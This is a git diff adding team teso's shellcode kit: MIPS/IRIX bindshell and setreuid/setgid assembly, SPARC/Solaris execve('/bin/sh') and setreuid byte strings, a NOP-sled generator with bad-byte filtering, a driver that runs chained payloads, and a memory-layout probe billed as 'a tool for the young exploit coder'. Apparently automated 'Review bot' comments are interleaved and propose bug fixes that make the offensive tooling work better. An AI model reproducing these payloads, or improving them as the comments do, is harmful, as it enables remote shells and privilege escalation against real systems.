68 /* accept (socket, (struct sockaddr *) cl_addr,
69 * &socklen)
70 * XXX: a1 is still the pointer to the sockaddr struct
71 * a2 should be 0x10 still
72 */
73 sw a2, -20(sp)
74 subu a2, sp, 20 /* a2 = &socklen */
75 li v0, SYS_accept /* 0x0441 */
76 syscall
77
78
79 /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
80 */
81 subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
82
83 /* socket returned in v0, save in s7
84 */
85 andi s7, v0, 0xffff
86
87 /* dup is emulated through close and fcntl, since irix offers no
88 * native dup syscall as for example linux. see phrack 56 for details
89 */
90dup_loop:
91 andi a0, s3, 0x0103 /* a0 = STD*_FILENO */
92 li v0, SYS_close /* 0x03ee */
93 syscall
94
95 andi a0, s7, 0xffff /* a0 = socket */
96 slti a1, zero, -1 /* a1 = 0 */
97 andi a2, s3, 0x0103 /* a2 = STD*_FILENO */
98 li v0, SYS_fcntl /* 0x0426 */
99 syscall
100
101 subu s3, 0x1011
102 bgez s3, dup_loop
103
104 /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
105 */
106 sw zero, -4(sp)
107
108 /* a2 (envp) is already zero due to the dup_loop
109 */
110gaddr: bltzal zero, gaddr /* rock on-. lsd */
111 subu a1, sp, 8
112
113 /* ra contains the proper address now */
114 addu ra, ra, 0x0120 /* add 32 + 0x0100 */
115
116 add a0, ra, -(8 + 0x100)
117 sb zero, -(1 + 0x100)(ra) /* store NUL */
118 sw a0, -8(sp)
119 li v0, SYS_execve
120 syscall
121
122 .end cbegin
123cend:
124
125 /* XXX append here: "/bin/sh\x42" */
126
diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s
new file mode 100644
index 0000000..90ab25d
--- /dev/null
+++ b/other/shellkit/mips_irix/read.s
@@ -0,0 +1,51 @@
1/* MIPS/IRIX PIC read/cacheflush code
2 *
3 * -sc.
4 *
5 * some note:
6 * since the data that is read in is treated in the data cache, you may
7 * experience a data/instruction cache incoherence, where the instruction
8 * cache still contains the old memory contents. to avoid this, send a lot
9 * of data, first the shellcode and then a huge bogus space of nops, which
10 * are to flush the data cache, later making the instruction cache populated
11 * with the real shellcode. or do it as we do it here, use a cacheflush
12 * syscall. this is only possible if this code is already in icache, so for
13 * the usual exploitation situation that does not help much.
14 */
15
16#include <sgidefs.h>
17#include <sys/regdef.h>
18#include <sys/asm.h>
19#include <sys.s>
20#include <sys/syscall.h>
21
22 .section .text
23
24 .globl cbegin
25 .globl cend
26
27cbegin:
28 .set noreorder
29 .set nomacro
30
31foo: bltzal zero, foo
32 slti a0, zero, -1
33
34 addu ra, ra, (0x0101 + 48)
35 subu a1, ra, 0x0101
36
37 li a2, 0x1010 /* read 0x1010 bytes max */
38 li v0, SYS_read
39 syscall
40
41 subu a0, ra, 0x0101 /* data was read to here */
42 li a1, 0x1010 /* should be cacheline aligned */
43 li t2, -4
44 not a2, t2 /* BCACHE = 0x03 */
45 li v0, SYS_cachectl /* 0x047e */
46 syscall
47 li t8, 0x7350 /* has to be a sane bds */
48
49 .end cbegin
50cend:
51
diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s
new file mode 100644
index 0000000..3223892
--- /dev/null
+++ b/other/shellkit/mips_irix/setgid.s
@@ -0,0 +1,30 @@
1/* MIPS/IRIX PIC setgid chainable code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 /* setgid (a0) */
22 li a0, 0x4141 /* gid ^ 0x5555 */
23 xor a0, a0, 0x5555
24 li v0, SYS_setgid /* 0x0416 */
25 syscall
26 li t8, 0x7350
27
28 .end cbegin
29cend:
30
diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s
new file mode 100644
index 0000000..9578262
--- /dev/null
+++ b/other/shellkit/mips_irix/setreuid.s
@@ -0,0 +1,32 @@
1/* MIPS/IRIX PIC setreuid chainable code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 /* setreuid (a0, a1) */
22 li a0, 0x4141 /* ruid ^ 0x5555 */
23 li a1, 0x4242 /* euid ^ 0x5555 */
24 xor a0, a0, 0x5555
25 xor a1, a1, 0x5555
26 li v0, SYS_setreuid /* 0x0464 */
27 syscall
28 li t8, 0x7350
29
30 .end cbegin
31cend:
32
diff --git a/other/shellkit/shellcode.c b/other/shellkit/shellcode.c
new file mode 100644
index 0000000..330fe2e
--- /dev/null
+++ b/other/shellkit/shellcode.c
@@ -0,0 +1,61 @@
1
2/* TODO: better randomness
3 */
4
5#include <sys/types.h>
6#include <time.h>
7#include <stdio.h>
8#include <stdlib.h>
9#include "shellcode.h"
10
11
12unsigned long int
13random_get (unsigned long int low, unsigned long int high)
14{
15 unsigned long int val;
16
17 if (low > high) {
18 low ^= high;
19 high ^= low;
20 low ^= high;
21 }
22
23 val = (unsigned long int) random ();
24 val %= (high - low);
25 val += low;
26
27 return (val);
28}
29
30
31void
32random_init (void)
33{
34 srandom (time (NULL));
35}
36
37
38int
39bad (unsigned char u)
40{
41 if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
42 return (1);
43
44 return (0);
45}
46
47int
48badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
49{
50 int n;
51
52 for (code_len -= 1 ; code_len >= 0 ; --code_len) {
53 for (n = 0 ; n < bad_len ; ++n)
54 if (code[code_len] == bad[n])
55 return (1);
56 }
57
58 return (0);
59}
60
61
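Review bot: `random_get` (lines 12–28) yields values in the half-open range `[low, high)` because of `val %= (high - low)` at line 24, and it divides by zero when `low == high`; neither is documented, and sparc.c calls `random_get (0, 1)` as a coin flip, which under this definition always returns 0. Settle on one contract, state it in the shellcode.h prototype comment, and guard the degenerate case with `if (low == high) return (low);` before the modulo. If the range is made inclusive (`val %= (high - low + 1);`), the `random_get (0, 17)` caller in mips.c needs checking against its table size; if it stays half-open, `sparc_torf` should call `random_get (0, 2)`.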
diff --git a/other/shellkit/shellcode.h b/other/shellkit/shellcode.h
new file mode 100644
index 0000000..02e090c
--- /dev/null
+++ b/other/shellkit/shellcode.h
@@ -0,0 +1,62 @@
1
2/* shellcode.h - shellcode structure and function definitions
3 *
4 * team teso
5 */
6
7#ifndef SHELLCODE_H
8#define SHELLCODE_H
9
10
11/* (nop_gen) function type which will generate a nop space:
12 * parameters: unsigned char *dest, unsigned int dest_len
13 *
14 * will generate no more than dest_len bytes of nop space. the length
15 * is rounded down to a multiple of arch_codelen, so for risc archs be
16 * sure dest_len % arch_codelen is zero
17 *
18 * return the number of nop bytes generated (not the instruction count)
19 *
20 * XXX: name your functions <arch>_nop
21 */
22typedef unsigned int (* nop_gen)(unsigned char *, unsigned int,
23 unsigned char *, int);
24
25/* helper macro to set individual bits
26 */
27#define BSET(dest, len, val, bw) { \
28 dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \
29 dest |= val << (8 - bw - len); /* set value bits */ \
30 bw += len; \
31}
32
33
34typedef struct {
35 char * code_string; /* description string of the code */
36 unsigned int code_len; /* length of code in bytes */
37 unsigned char * code; /* code byte array */
38} shellcode;
39
40
41typedef struct {
42 char * arch_string; /* description string of this arch */
43 unsigned int arch_codelen; /* minimum instruction length */
44 nop_gen arch_nop; /* nop space generation function */
45 shellcode ** arch_codes; /* shellcode array for this arch */
46} arch;
47
48
49unsigned long int
50random_get (unsigned long int low, unsigned long int high);
51
52void
53random_init (void);
54
55int
56bad (unsigned char u);
57
58int
59badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len);
60
61#endif
62
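Review bot: the `nop_gen` comment at lines 11–12 lists only `dest` and `dest_len`, but the typedef at 22–23 takes four parameters; the comment should name the `bad` byte list and `bad_len` as mips.h does. `BSET` at lines 27–31 is a bare brace block, so `if (x) BSET (...); else ...` does not compile, and its arguments are not parenthesised, so a compound `val` or `bw` expression changes the result. The usual `do { ... } while (0)` form with parenthesised parameters fixes both.
```c
#define BSET(dest, len, val, bw) do { \
	(dest) &= ~(((unsigned char) ~0) >> (bw));	/* clear lower bits */ \
	(dest) |= (val) << (8 - (bw) - (len));		/* set value bits */ \
	(bw) += (len); \
} while (0)
```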
diff --git a/other/shellkit/shellcode.o b/other/shellkit/shellcode.o
new file mode 100644
index 0000000..189bd9e
--- /dev/null
+++ b/other/shellkit/shellcode.o
Binary files differ
diff --git a/other/shellkit/shellkit b/other/shellkit/shellkit
new file mode 100644
index 0000000..1dab7f3
--- /dev/null
+++ b/other/shellkit/shellkit
Binary files differ
diff --git a/other/shellkit/shellkit.c b/other/shellkit/shellkit.c
new file mode 100644
index 0000000..79d830d
--- /dev/null
+++ b/other/shellkit/shellkit.c
@@ -0,0 +1,123 @@
1/* shellkit.c - experimentation program for included shellcodes
2 *
3 * team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include <unistd.h>
9#include "shellkit.h"
10
11
12void usage (void);
13void sc_list (void);
14
15int dump = 0;
16int execute = 0;
17
18
19void
20usage (void)
21{
22 printf ("usage: shellkit [-hdlx] [-e env1 [-e env2] ...] [code-identifier1 [ci2 [...]]]\n\n");
23 printf ("options:\n");
24 printf ("\t-h\thelp, you're just viewing it\n"
25 "\t-d\tdump shellcode in hex\n"
26 "\t-l\tonly list available shellcodes\n"
27 "\t-x\texecute choosen shellcode\n"
28 "\t-e env\tbuild an environment for the shellcode, use -e list\n"
29 "\t\tto get a list\n\n");
30 printf ("the shellkit utility will build a chained block of codes described by the\n"
31 "given code identifiers, copy it to a writeable place of memory and will\n"
32 "do anything necessary to execute this block of code on your architecture.\n"
33 "before executing the code the environments specified are installed.\n"
34 "you can - of course - only execute code for your architecture.\n\n");
35
36 exit (EXIT_FAILURE);
37}
38
39
40void
41env_list (void)
42{
43 printf ("list of available environments:\n\n");
44
45 exit (EXIT_SUCCESS);
46}
47
48
49void
50sc_list (void)
51{
52 int sc_walker;
53 int arch_walker;
54 arch * a;
55
56
57 for (arch_walker = 0 ; shellcodes[arch_walker] != NULL ;
58 ++arch_walker)
59 {
60 a = shellcodes[arch_walker];
61
62 printf ("%s:\n", a->arch_string);
63 for (sc_walker = 0 ; a->arch_codes[sc_walker] != NULL ;
64 ++sc_walker)
65 {
66 printf ("\t%-30s %3d\n",
67 a->arch_codes[sc_walker]->code_string,
68 a->arch_codes[sc_walker]->code_len);
69 }
70 printf ("\n");
71 }
72
73 exit (EXIT_SUCCESS);
74}
75
76
77int
78main (int argc, char *argv[])
79{
80 int c;
81 int xenvc = 0;
82 char * xenv[16];
83
84
85 random_init ();
86 memset (xenv, '\x00', sizeof (xenv));
87
88 if (argc < 2)
89 sc_list ();
90
91 while ((c = getopt (argc, argv, "hdlxe:")) != -1) {
92 switch (c) {
93 case 'h':
94 usage ();
95 break;
96 case 'd':
97 dump = 1;
98 break;
99 case 'l':
100 sc_list ();
101 break;
102 case 'x':
103 execute = 1;
104 break;
105 case 'e':
106 if (strcmp (optarg, "list") == 0)
107 env_list ();
108 if (xenvc >= 15) {
109 fprintf (stderr, "insane, huh? dont mess\n");
110 exit (EXIT_FAILURE);
111 }
112 xenv[xenvc++] = optarg;
113 break;
114 default:
115 usage ();
116 break;
117 }
118 }
119
120 exit (EXIT_SUCCESS);
121}
122
123
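Review bot: `main` calls `memset` (line 86) and `strcmp` (line 106) without `#include <string.h>`, which is an implicit-declaration error on current compilers unless one of the arch headers happens to pull it in; add it to the include block at lines 6–9. `dump` and `execute` are set by the options but never read, and the `xenv` list is collected and then dropped, so `main` exits right after option parsing while the usage text describes building and running a chained block; if that part is still to come, a `/* TODO: build and run the selected codes */` before line 120 would say so. In `sc_list`, the `%3d` conversion at line 66 receives `code_len`, which shellcode.h declares as `unsigned int`; use `%3u`.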
diff --git a/other/shellkit/shellkit.h b/other/shellkit/shellkit.h
new file mode 100644
index 0000000..074fd65
--- /dev/null
+++ b/other/shellkit/shellkit.h
@@ -0,0 +1,31 @@
1/* shellkit.h - main shellcode kit definition file
2 *
3 * everything is merged here.
4 *
5 * team teso
6 */
7
8#ifndef SHELLKIT_H
9#define SHELLKIT_H
10
11#include "shellcode.h"
12
13/* individual architectures */
14#include "hppa_hpux.h"
15#include "mips_irix.h"
16#include "sparc_solaris.h"
17#include "x86_bsd.h"
18#include "x86_linux.h"
19
20arch * shellcodes[] = {
21 &hppa_hpux,
22 &mips_irix,
23 &sparc_solaris,
24 &x86_bsd,
25 &x86_linux,
26 NULL,
27};
28
29
30#endif
31
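Review bot: `arch * shellcodes[] = { ... };` at lines 20–27 is an object definition in a header, so a second translation unit including shellkit.h produces a duplicate-symbol link error; declare it here as `extern arch * shellcodes[];` and move the initialised array into shellkit.c. The header comment at lines 1–6 could then say that shellkit.c owns the table and that each arch header must only declare its `arch` object with `extern`.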
diff --git a/other/shellkit/sparc.c b/other/shellkit/sparc.c
new file mode 100644
index 0000000..45fe647
--- /dev/null
+++ b/other/shellkit/sparc.c
@@ -0,0 +1,140 @@
1/* sparc.c - generic sparc functions
2 *
3 * by team teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include "shellcode.h"
9#include "sparc.h"
10
11
12static int sparc_torf (void);
13static unsigned long int sparc_getinstr (unsigned char *pat,
14 unsigned char *bad, int bad_len);
15
16
17static int
18sparc_torf (void)
19{
20 return (random_get (0, 1));
21}
22
23
24static unsigned long int
25sparc_getinstr (unsigned char *pat, unsigned char *bad, int bad_len)
26{
27 int x; /* bitfield walker */
28 unsigned char bc = 0;
29 unsigned long int i = 0; /* generated instruction */
30
31
32 for (x = 31 ; x > 0 ; --x) {
33
34 switch (pat[x]) {
35 case '.':
36 if (badstr (&bc, 1, bad, bad_len)) {
37 /*x -= 8;*/
38 printf ("redo byte! #muh\n");
39 }
40 bc = 0;
41 break;
42
43 case '0':
44 break;
45
46 case '1':
47 i |= (1 << x);
48 bc |= (1 << (x % 8));
49 break;
50
51 case 'v':
52 if (badstr (&bc, 1, bad, bad_len)) {
53 i |= (1 << x);
54 bc |= (1 << (x % 8));
55 } else if (sparc_torf ()) {
56 i |= (1 << x);
57 bc |= (1 << (x % 8));
58 }
59 break;
60
61 case 'r':
62 case 'f':
63 case 's':
64 if (badstr (&bc, 1, bad, bad_len)) {
65 i |= (1 << x);
66 bc |= (1 << (x % 8));
67 } else if (sparc_torf ()) {
68 i |= (1 << x);
69 bc |= (1 << (x % 8));
70 }
71 break;
72 default:
73 fprintf (stderr, "sorry, can not generate nop's for "
74 "trinary sparcs ...\n");
75
76 exit (EXIT_FAILURE);
77 break;
78 }
79 }
80
81 return (i);
82}
83
84
85/* XXX: DO NOT USE UNTESTED! */
86unsigned int
87sparc_nop (unsigned char *dest, unsigned int dest_len,
88 unsigned char *bad, int bad_len)
89{
90 unsigned long int * dest_p = NULL;
91 unsigned int count = 0;
92
93 /* abstract representation of a sparc instruction.
94 * '1', '0': real bits of the instruction
95 * 'r', 'f', 's': destination, first and second source register
96 * 'v': either a 1 or 0 bit (any value)
97 *
98 * for details see "The SPARC Architecture Manual", chapter 5
99 * ("Instructions") and appendix F + B.
100 */
101 unsigned char * pat = NULL;
102 unsigned char * instr_format[] = {
103 "10rrrrr0.00011fff.ff000000.000sssss",
104 "10rrrrr0.00011fff.ff1vvvvv.vvvvvvvv", /* xor */
105
106 "10rrrrr0.00111fff.ff000000.000sssss",
107 "10rrrrr0.00111fff.ff1vvvvv.vvvvvvvv", /* xnor */
108
109 "10rrrrr0.00100fff.ff000000.000sssss",
110 "10rrrrr0.00100fff.ff1vvvvv.vvvvvvvv", /* sub */
111
112 "10rrrrr0.00010fff.ff000000.000sssss",
113 "10rrrrr0.00010fff.ff1vvvvv.vvvvvvvv", /* or */
114
115 "10rrrrr0.00000fff.ff000000.000sssss",
116 "10rrrrr0.00000fff.ff1vvvvv.vvvvvvvv", /* add */
117
118 "10rrrrr0.00001fff.ff000000.000sssss",
119 "10rrrrr0.00001fff.ff1vvvvv.vvvvvvvv", /* and */
120
121 /* XXX/TODO: add more codes */
122
123 NULL,
124 };
125
126
127 /* take care of instruction size
128 */
129 dest_len = dest_len - (dest_len % 4);
130 dest_p = (unsigned long int *) dest;
131
132 for ( ; count < dest_len ; count += 4) {
133 pat = instr_format[rand () % 12];
134 *dest_p++ = sparc_getinstr (pat, bad, bad_len);
135 }
136
137 return (count);
138}
139
140
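Review bot: `sparc_nop` writes through `unsigned long int * dest_p` (lines 130 and 134) while advancing `count` by 4, so on an LP64 host each iteration stores 8 bytes and the loop runs past the end of `dest`; store the four bytes explicitly as mips.c does (`dest[count + 0] = (i >> 24) & 0xff;` and so on) or use a fixed 32-bit type. `sparc_torf` (lines 17–21) relies on `random_get (0, 1)`, which with the `val %= (high - low)` in shellcode.c always yields 0, so the 'v', 'r', 'f' and 's' positions are never randomised. In `sparc_getinstr` the loop `for (x = 31 ; x > 0 ; --x)` at line 32 indexes `pat`, a 35-character string with '.' separators, by bit number and never visits index 0, so the pattern-to-bit mapping has to be reworked before the `XXX: DO NOT USE UNTESTED!` note at line 85 can go. `instr_format[rand () % 12]` at line 133 also hard-codes the table size and bypasses `random_get`.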
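diff --git a/other/shellkit/sparc.h b/other/shellkit/sparc.h
new file mode 100644
index 0000000..bf5bd93
--- /dev/null
+++ b/other/shellkit/sparc.h
@@ -0,0 +1,10 @@
+
+#ifndef SPARC_H
+#define SPARC_H
+
+unsigned int
+sparc_nop (unsigned char *dest, unsigned int dest_len,
+ unsigned char *bad, int bad_len);
+
+#endif
+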
diff --git a/other/shellkit/sparc.o b/other/shellkit/sparc.o
new file mode 100644
index 0000000..22f52c8
--- /dev/null
+++ b/other/shellkit/sparc.o
Binary files differ
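diff --git a/other/shellkit/sparc_solaris.c b/other/shellkit/sparc_solaris.c
new file mode 100644
index 0000000..ce44a1a
--- /dev/null
+++ b/other/shellkit/sparc_solaris.c
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "shellcode.h"
+#include "sparc.h"
+
+
+shellcode sparc_solaris_execvesh = {
+ "sparc-solaris-execve",
+ 48,
+ "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda"
+ "\x90\x03\xa0\x08\x92\x13\x80\x0e\x9c\x03\xa0\x10"
+ "\x94\x1b\x80\x0e\xec\x3b\xbf\xf8\xd0\x23\xbf\xf0"
+ "\xd4\x23\xbf\xf4\x82\x10\x20\x3b\x91\xd0\x20\x08",
+};
+
+
+shellcode sparc_solaris_exit = {
+ "sparc-solaris-exit",
+ 8,
+ "\x82\x10\x20\x01\x91\xd0\x20\x08",
+};
+
+
+shellcode sparc_solaris_setgid = {
+ "sparc-solaris-setgid",
+ 16,
+ "\x90\x10\x21\x42\x90\x1a\x21\x44\x82\x10\x20\x2e"
+ "\x91\xd0\x20\x08",
+};
+
+
+shellcode sparc_solaris_setreuid = {
+ "sparc-solaris-setreuid",
+ 24,
+ "\x90\x10\x21\x42\x90\x1a\x21\x44\x92\x10\x21\x46"
+ "\x92\x1a\x61\x48\x82\x10\x20\x2e\x91\xd0\x20\x08",
+};
+
+
+shellcode * sparc_solaris_shellcodes[] = {
+ &sparc_solaris_execvesh,
+ &sparc_solaris_exit,
+ &sparc_solaris_setgid,
+ &sparc_solaris_setreuid,
+ NULL,
+};
+
+
+arch sparc_solaris = {
+ "sparc-solaris",
+ 4,
+ sparc_nop,
+ sparc_solaris_shellcodes
+};
+
+
+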
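Review bot: The name string on line 9, `"sparc-solaris-execve"`, matches neither its variable `sparc_solaris_execvesh` nor the `<arch>-<os>-<suffix>` pattern every other table follows (`"x86-bsd-execvesh"`, `"x86-linux-execvesh"`). If shellkit.c selects entries by this string, which this hunk does not show, the sparc variant would be the one odd name out; `"sparc-solaris-execvesh",` keeps the naming uniform. A one-line comment above each table pointing at the `.s` source it was assembled from (`/* built from sparc_solaris/setgid.s */`) would also make the byte strings reviewable against their origin.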
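diff --git a/other/shellkit/sparc_solaris.h b/other/shellkit/sparc_solaris.h
new file mode 100644
index 0000000..24419e3
--- /dev/null
+++ b/other/shellkit/sparc_solaris.h
@@ -0,0 +1,6 @@
+#ifndef SPARC_SOLARIS_H
+#define SPARC_SOLARIS_H
+
+arch sparc_solaris;
+
+#endif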
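Review bot: `arch sparc_solaris;` on line 4 is a tentative definition rather than a declaration, so every translation unit that includes this header defines the symbol; it only links while the toolchain merges common symbols and fails with a multiple-definition error under `-fno-common`, which newer gcc releases default to. Write it as `extern arch sparc_solaris;`. The header also uses the `arch` type without including shellcode.h, unlike x86_bsd.h, so it compiles only when the includer happened to pull that header in first. x86_bsd.h has the same missing `extern` on its `arch x86_bsd;` line.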
diff --git a/other/shellkit/sparc_solaris.o b/other/shellkit/sparc_solaris.o
new file mode 100644
index 0000000..0b98d72
--- /dev/null
+++ b/other/shellkit/sparc_solaris.o
Binary files differ
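diff --git a/other/shellkit/sparc_solaris/AUTHORS b/other/shellkit/sparc_solaris/AUTHORS
new file mode 100644
index 0000000..01bb209
--- /dev/null
+++ b/other/shellkit/sparc_solaris/AUTHORS
@@ -0,0 +1,2 @@
+palmers / teso
+smiler / teso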
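diff --git a/other/shellkit/sparc_solaris/NOTES b/other/shellkit/sparc_solaris/NOTES
new file mode 100644
index 0000000..166eccc
--- /dev/null
+++ b/other/shellkit/sparc_solaris/NOTES
@@ -0,0 +1,11 @@
+would this shellcodes work in sparc NetBSD or SunOS?
+would require "ta 0" instead of "ta8"?
+
+
+todo:
+connect
+bind
+chmod
+read
+spset
+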
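diff --git a/other/shellkit/sparc_solaris/execve.s b/other/shellkit/sparc_solaris/execve.s
new file mode 100644
index 0000000..0a0c11b
--- /dev/null
+++ b/other/shellkit/sparc_solaris/execve.s
@@ -0,0 +1,20 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+ sethi 0xbd89a, %l6
+ or %l6, 0x16e, %l6
+ sethi 0xbdcda, %l7
+ add %sp, 8, %o0
+ or %sp, %sp, %o1
+ add %sp, 16, %sp
+ xor %o6, %o6, %o2
+ std %l6, [%sp - 8]
+ st %o0, [%sp - 16]
+ st %o2, [%sp - 12]
+ mov 0x3b, %g1
+ ta 8
+
+cend:
+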
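diff --git a/other/shellkit/sparc_solaris/exit.s b/other/shellkit/sparc_solaris/exit.s
new file mode 100644
index 0000000..3019a42
--- /dev/null
+++ b/other/shellkit/sparc_solaris/exit.s
@@ -0,0 +1,10 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+ mov 0x1, %g1
+ ta 0x8
+
+cend:
+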
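diff --git a/other/shellkit/sparc_solaris/setgid.s b/other/shellkit/sparc_solaris/setgid.s
new file mode 100644
index 0000000..c307065
--- /dev/null
+++ b/other/shellkit/sparc_solaris/setgid.s
@@ -0,0 +1,12 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+ mov 0x4142, %o0
+ xor 0x4344, %o0, %o0
+ mov 0x2e, %g1
+ ta 0x8
+
+cend:
+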
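diff --git a/other/shellkit/sparc_solaris/setreuid.s b/other/shellkit/sparc_solaris/setreuid.s
new file mode 100644
index 0000000..e17c375
--- /dev/null
+++ b/other/shellkit/sparc_solaris/setreuid.s
@@ -0,0 +1,14 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+ mov 0x4142, %o0
+ xor 0x4344, %o0, %o0
+ mov 0x4546, %o1
+ xor 0x4748, %o1, %o1
+ mov 0xca, %g1
+ ta 0x8
+
+cend:
+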
diff --git a/other/shellkit/splocoder b/other/shellkit/splocoder
new file mode 100644
index 0000000..6828783
--- /dev/null
+++ b/other/shellkit/splocoder
Binary files differ
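diff --git a/other/shellkit/splocoder.c b/other/shellkit/splocoder.c
new file mode 100644
index 0000000..96e36f8
--- /dev/null
+++ b/other/shellkit/splocoder.c
@@ -0,0 +1,184 @@
+/*
+
+ A tool for the young exploit coder, Copyright (c) acpizer, 2001.
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/utsname.h>
+
+
+char small_global[] = "acpizer";
+
+int uninitialized_global;
+
+
+int endianess() {
+ union {
+ long l;
+ char c[sizeof (long)];
+ } u;
+
+ u.l = 1;
+
+ return (u.c[sizeof (long) - 1] == 1);
+}
+
+
+static int iterate = 10;
+
+int stack_growsdown(int *x) {
+ auto int y;
+
+
+ y = (x > &y);
+
+ if (--iterate > 0)
+ y = stack_growsdown(&y);
+
+ if (y != (x > &y))
+ exit(1);
+
+ return y;
+}
+
+typedef struct {
+ char * sys_name;
+ char * sys_release;
+ char * sys_version;
+ char * sys_machine;
+
+ unsigned long int malloc_zero;
+ unsigned long int malloc_neg;
+ unsigned long int malloc_big;
+
+ unsigned long int malloc_small;
+ unsigned long int malloc_tiny;
+
+ unsigned long int bss;
+ unsigned long int data;
+
+ int sizeof_int;
+ int sizeof_voidptr;
+
+ unsigned long int env_start;
+
+ unsigned long int frame_addr;
+
+ int stack_down;
+ int endian_big;
+} sys_def;
+
+sys_def this;
+
+
+int
+main (int argc, char *argv[], char *env[])
+{
+ struct utsname uts;
+
+ char localstack[5];
+ auto int x;
+
+
+ printf("splocoder, v1.0 by acpizer & sc -- team teso.\n\n");
+
+ uname (&uts);
+
+ this.sys_name = uts.sysname;
+ this.sys_release = uts.release;
+ this.sys_version = uts.version;
+ this.sys_machine = uts.machine;
+
+#ifdef VERBOSE
+ printf("System: %s %s %s %s\n\n", uts.sysname, uts.release, uts.version,
+ uts.machine);
+#endif
+
+ this.malloc_zero = (unsigned long int) malloc (0);
+ this.malloc_neg = (unsigned long int) malloc (-4);
+ this.malloc_big = (unsigned long int) malloc (1024 * 1024);
+
+#ifdef VERBOSE
+ printf("malloc(0) returns: 0x%08lx\n", this.malloc_zero);
+ printf("malloc(-4) returns: 0x%08lx\n", this.malloc_neg);
+ printf("Big heap: 0x%08lx\n", this.malloc_big);
+#endif
+
+ /* There might be a differece, depending on malloc implementation. */
+ this.malloc_small = (unsigned long int) malloc (100);
+ this.malloc_tiny = (unsigned long int) malloc (5);
+
+#ifdef VERBOSE
+ printf("Small heap: 0x%08lx\n", this.malloc_small);
+ printf("Tiny heap: 0x%08lx\n\n", this.malloc_tiny);
+#endif
+
+
+ this.bss = (unsigned long int) &uninitialized_global;
+ this.data = (unsigned long int) &small_global;
+
+#ifdef VERBOSE
+ printf("bss is at: 0x%08lx\n", this.bss);
+ printf("Initialized global data is at: 0x%08lx\n\n", this.data);
+#endif
+
+
+ this.sizeof_int = sizeof (int);
+ this.sizeof_voidptr = sizeof (void *);
+
+#ifdef VERBOSE
+ printf("sizeof(int): %d\n", this.sizeof_int);
+ printf("sizeof(void *): %d\n\n", this.sizeof_voidptr);
+#endif
+
+
+ this.env_start = (unsigned long int) &env[0];
+#ifdef VERBOSE
+ printf("environ[0]: 0x%08lx\n\n", this.env_start);
+#endif
+
+ this.frame_addr = (unsigned long int) &localstack;
+#ifdef VERBOSE
+ printf("Local stack variable is at 0x%08lx\n", this.frame_addr);
+#endif
+
+ this.stack_down = stack_growsdown (&x) ? 1 : 0;
+#ifdef VERBOSE
+ printf("Stack growth direction: %s\n", this.stack_down ? "down" : "up");
+#endif
+
+ this.endian_big = endianess () ? 1 : 0;
+#ifdef VERBOSE
+ printf("Endianess: %s\n\n", this.endian_big ? "big" : "little");
+#endif
+
+
+ {
+ char sys[30];
+
+ snprintf (sys, sizeof (sys), "%s-%s-%s", this.sys_name,
+ this.sys_release, this.sys_machine);
+ fprintf (stderr, "%-32s ", sys);
+ }
+ fprintf (stderr, "%s %-10s ", this.endian_big ? "be" : "le",
+ this.stack_down ? "stackdown" : "stackup");
+ fprintf (stderr, "%3d %3d\n",
+ this.sizeof_int, this.sizeof_voidptr);
+
+ fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx",
+ " data bss stack env",
+ this.data, this.bss,
+ this.frame_addr, this.env_start);
+ fprintf (stderr, "\n");
+
+ fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx %08lx ",
+ " M: zero neg big small tiny",
+ this.malloc_zero, this.malloc_neg, this.malloc_big,
+ this.malloc_small, this.malloc_tiny);
+ fprintf (stderr, "\n");
+
+ exit (EXIT_SUCCESS);
+}
+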
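Review bot: The return value of `uname (&uts)` on line 87 is ignored, so when it fails the four `this.sys_*` pointers reference uninitialized stack bytes that are later printed through `%s`; `if (uname (&uts) != 0) { perror ("uname"); exit (EXIT_FAILURE); }` covers it. Those pointers also alias the local `uts`, which is harmless while only `main` reads them but would dangle if the global `this` were ever consulted after `main` returns, so a comment such as `/* sys_* point into main's utsname; valid only during main */` on the struct is worth adding. The `snprintf` into `char sys[30]` on line 161 silently truncates the `sysname-release-machine` identifier once the three fields exceed 29 bytes together, which is likely on modern systems; printing the three fields directly with one `fprintf` would avoid the cut-off label. `stack_growsdown` compares pointers to distinct objects, which C leaves unspecified; it works on flat address spaces but deserves a `/* relies on a linear address space */` note.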
diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz
new file mode 100644
index 0000000..6fa3a5e
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools.tar.gz
Binary files differ
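diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile
new file mode 100644
index 0000000..19e8fd4
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/Makefile
@@ -0,0 +1,5 @@
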